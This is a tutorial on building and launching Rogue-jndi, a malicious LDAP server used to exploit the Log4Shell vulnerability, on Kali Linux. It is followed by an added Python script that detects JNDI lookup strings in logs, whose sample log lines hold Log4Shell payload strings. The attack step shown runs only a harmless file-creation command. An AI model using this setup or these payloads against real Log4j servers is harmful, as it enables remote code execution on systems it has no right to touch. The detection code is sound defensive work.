How To Install Rogue-Jndi On Kali Linux

Following the previous tutorial in which we looked at the Log4j vulnerability in VMware vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker-controlled LDAP server is required to provide the malicious Java class (with a reverse shell, for example) in response to the forged LDAP request from the server running a vulnerable version of Log4j. There are quite a few solutions out there that provide this functionality, and one of them is Rogue-jndi. Rogue-jndi is a malicious LDAP server for JNDI injection attacks. In the next section I will give a short demonstration of how to install rogue-jndi, along with the required dependencies, on the latest version of Kali Linux.

To build rogue-jndi, Java v1.7+ and Maven v3+ are required on the system. Java is already installed by default so we only have to install Maven. Maven can be installed with the following commands:

sudo apt-get update
sudo apt-get install maven

Press y to install Maven.

The next step is to clone the rogue-jndi repository. We will do this on the Desktop of the Kali user and then change directory to the cloned folder with the following commands:

cd Desktop
git clone
cd rogue-jndi

Clone the rogue-jndi repository.

Inside the rogue-jndi folder we have to run the following command to build the rogue-jndi project, which will take a minute or two to complete:

mvn package

The build process for rogue-jndi is started with the mvn package command.

The following output indicates that the build process completed successfully:

Build process completed successfully.

We can also see that a ‘target’ folder was created on our system, containing the jar file that can be executed with Java:

RogueJndi-1.1.jar was created on our system.

We can run rogue-jndi and output the usage instructions with the following command:

java -jar target/RogueJndi-1.1.jar -h

Rogue-jndi usage instructions

At this point we can start the malicious LDAP server with the required parameters, such as a command that will be served as a Java class in response to an LDAP query. The following command starts the LDAP server and provides a Java class that creates a text file on the system, as used in the Log4Shell VMware vCenter Server (CVE-2021-44228) post:

java -jar target/RogueJndi-1.1.jar --command "touch /tmp/test.txt" --hostname ""

The malicious LDAP server is running.

From here we can exploit vulnerable Log4j applications with payloads that connect to our malicious LDAP server. More detailed information on how to do this can be found in the following post:

Log4Shell VMware vCenter Server (CVE-2021-44228)
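
On the defending side, the lookup string that makes a vulnerable Log4j instance send the LDAP request described above usually ends up in web or application logs. The following is an added example, not part of the original tutorial or of rogue-jndi: it scans log lines for JNDI lookup strings and extracts the callback host so it can be checked against egress logs. The function names, log lines and addresses are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Matches the literal form ${jndi:<scheme>://<host>[:port]. Strings assembled
# from nested lookups need normalising before this pattern will match them.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>ldaps?|rmi|dns)://"
    r"(?P<host>\[[0-9a-f:]+\]|[^/:}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)

def decode(line, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (proxies may re-encode)."""
    for _ in range(rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line

def find_callbacks(lines, allowed_hosts=frozenset()):
    """Return one finding per JNDI lookup string seen in the given log lines."""
    findings = []
    for lineno, raw in enumerate(lines, 1):
        for m in JNDI_RE.finditer(decode(raw)):
            host = m.group("host").lower()
            if host in allowed_hosts:  # e.g. an internal scanner's listener
                continue
            findings.append({
                "line": lineno,
                "client": raw.split(" ", 1)[0],  # first field of the log line
                "scheme": m.group("scheme").lower(),
                "host": host,
                "port": int(m.group("port")) if m.group("port") else None,
            })
    return findings

# Constructed access-log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.9 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.44 - - [12/Dec/2021:10:03:11 +0000] "GET /?q=%24%7BJNDI%3ALDAP%3A%2F%2F198.51.100.8%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for f in find_callbacks(SAMPLE_LOG):
        print(f"line {f['line']}: client {f['client']} -> "
              f"{f['scheme']}://{f['host']} port {f['port']}")
```

A hit in the request log only shows that the string was received; an outbound connection from the application server to the extracted host is what indicates the lookup was actually performed.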
